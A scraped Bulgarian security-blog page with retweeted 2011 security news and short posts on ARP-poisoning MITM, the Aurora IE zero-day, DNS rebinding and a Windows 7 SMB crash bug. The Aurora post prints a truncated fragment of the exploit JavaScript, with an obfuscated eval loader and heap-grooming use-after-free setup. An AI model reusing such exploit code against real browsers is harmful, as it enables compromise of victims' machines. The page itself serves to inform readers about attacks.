Warning: gzinflate() [function.gzinflate]: data error in /home/singu/chzv.net/wp-content/plugins/xhanch-my-twitter/inc/common.php on line 187
Warning: gzinflate() [function.gzinflate]: data error in /home/singu/chzv.net/wp-content/plugins/xhanch-my-twitter/inc/common.php on line 187
Последни туитове
RT @dave_rel1k: SET v1.5 interactive shell running on OSX. No sir your machine isn't infected, mac's don't have viruses. http://yfrog.co ... - на 16/06/2011 в 09:17:09
RT @PrivacyCamp: PayPal vulnerability allows access to any account within 30 seconds http://ow.ly/5iZcK - на 16/06/2011 в 09:07:16
Хроника на сагата около Сони - кога и какво е хакнато - http://t.co/sxejfv4 - на 11/06/2011 в 11:56:21
RT @mikkohypponen: Malware gang's $14.8 million bank account frozen: http://bit.ly/jrcTuf from F-Secure Weblog - на 11/06/2011 в 01:54:21
RT @mikkohypponen: Citibank says they too were hacked. They lost card information of one percent of their customers: http://t.co/5sFxWOz ... - на 09/06/2011 в 08:33:22
RT @dave_rel1k: Another Social-Engineer Toolkit (SET) update, added multi-threading to spear phishing mass mails. #sweet - на 09/06/2011 в 07:38:55
RT @taviso: Should you trust a root CA that couldn't keep track of it's own keys? Trick question, you already do. http://i.imgur.com/oTS ... - на 09/06/2011 в 07:37:36
RT @rapid7: New Metasploit modules designed specifically for testing firewalls, IDS, IPS, and DLP solutions - http://r-7.co/jZlksz - на 07/06/2011 в 03:49:34
RT @dave_rel1k: SET v1.4.1 has been updated in the Back|Track repositories. Lot's of bug fixes and updates around relative paths and fea ... - на 07/06/2011 в 03:32:12
RT @mikkohypponen: Fun trick of the day: Try 'ping 2130706433' from the command line and figure out why it works. - на 23/05/2011 в 23:09:33
RT @dave_rel1k: The Social-Engineer Toolkit (SET) v1.4.1 has been released. Adds statistics for harvester, bug fixes, and more. - на 20/05/2011 в 22:54:02
В това кратко видео ще наблюдавате как с помоща на ARP poisoning се прави класическа MITM1 атака, която пренасочва трафика към машината на атакуващия. Този трафик се анализира с driftnet, като се визуализират изображенията от HTTP потока.
През миналата седмица Google публикуваха новината, че мрежите им са успешно атакувани от средата на декември и е имало няколко пробива. Малко по-късно през седмицата Yahoo също си призна, че се е случило и при тях. Най-вероятно над 30 технологични компании са засегнати, но засега само Adobe и Juniper са си признали, освен двата web-гиганта. В самият Google атаката е била насочена към определени gmail акаунти и фирмен сорс-код. Акаунтите са принадлежали на китайски дисиденти, а атаките са изпълнени от територията на Китай, според повечето агенции – китайската държавна организация за кибервойна. Ако пропуснем политическият аспект, при атаките се използва zero-day експлойт за Internet Explorer, наречен Аврора от McAfee ( MS advisory, CVE-2010-0249 ). Според Майкрософт, уязвими са IE5 до IE8 и най-вероятно ще бъде изкаран специален пач по случая. Атаката е била целенасочена, като са използвани предварително набелязани служители, на които да бъде изпратен линк към страница със зловредния код. При посещение на страницата, кода се стартира и отваря обратен канал към атакуващия, като по този начин му позволява достъп до мрежата. Ето демонстрационно видео как се случва това ( Metasploit + meterpreter ):
for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i < 200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){ e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); } function ev2(){ p = " \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d"; for (i = 0; i < x1.length; i ++ ){ x1[i].data = p; } ; var t = e1.srcElement; // //
Robert “RSnake” Hansen е записал следното видео, което обяснява относително новия и непознат експлойт, наречен DNS Rebinding, атакуващ специфично взаимодействието между браузъра и плъгините ( по-точно Flash и Java )Видеото е малко дългичко, но това е, защото RSnake започва почти от нулата – как работи DNS, кешинга, TTL и т.н.
Ако искате да прочетете малко повече по темата, препоръчвам “Protecting Browsers from DNS Rebinding Attacks” от Collin Jackson, Adam Barth, Andrew Bortz, Weidong Shao и Dan Boneh от Станфордския университет.
Интересно приложение се е появило за Android1 – с него можете да “тествате” дали определен сървър е уязвим към SMB дупката, за която дупка споменах преди няколко дни. При “теста”, ако машината е уязвима, ще забие на BSoD, което си е прекрасно решение за DDoS атака в джоба ви. Повече информация и QR code – на сайта на приложението ( което също така вече има спонсорирана от реклами версия ).
Новото отроче на Редмънт е уязвимо към атака, която позволява отдалечено да се причини BSOD. Атаката е открита от Laurent Gaffi и се причинява от погрешно формирана SMB заявка ( повече за атаката – тук ). Засегнат е само Windows 7, версии Vista, 2003, XP и т.н. не са уязвими, защото за версия 7, Майкрософт напълно са пренаписали голяма част от мрежовата субсистема.
На няколко места се споменава Teardrop, но това е напълно различна атака – Teardrop използва погрешно формирани TCP пакети и освен Windows 3.11, 95 и NT мори и някои Linux ядра.